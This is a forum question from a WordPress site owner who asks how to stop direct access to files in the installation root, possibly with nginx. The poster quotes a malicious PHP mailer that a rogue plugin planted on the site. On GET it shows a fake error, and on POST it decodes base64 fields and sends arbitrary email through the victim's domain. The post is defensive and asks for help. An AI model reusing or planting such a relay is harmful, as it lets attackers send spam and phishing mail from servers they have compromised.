WordPress disable direct access of files in WordPress installation path

Question

I want to add a security feature to my WordPress website to stop direct access to files added to the root of WordPress installation, recently I discovered that a malicious plugin added some files to send email. Below is the malicious php code added.

<?php

$method = $_SERVER['REQUEST_METHOD'];

switch ($method) {
  case 'GET':
    //Here Handle GET Request
    echo '###ERROR 404';
exit;
    break;
  case 'POST':
    //Here Handle POST Request

foreach($_POST as $key => $x_value) {

$data = base64_decode($x_value) ;
$to_data = explode('|',  $data);

$to = $to_data[0];
$x_subject = $to_data[1];
$x_body = $to_data[2];
$from_user = $to_data[3];
$from_email = $to_data[4];
$header = $to_data[5];

$jfnbrsjfq =  mail($to, $x_subject, $x_body, $header);
if($jfnbrsjfq){echo 'error 403';} else {echo 'error 404 : ' . $jfnbrsjfq;} 

}
}

In this case the hacker would pass some parameters to send emails using my domain while using this code.

I thought there might be a way to disable direct access of this files to send email or any other malicious activity. Is there a way to restrict using nginx? What is the best approach to deal with this case. I will appreciate any useful input.

0
kikuyu1 4 weeks 0 Answers 6 views 0

Leave an answer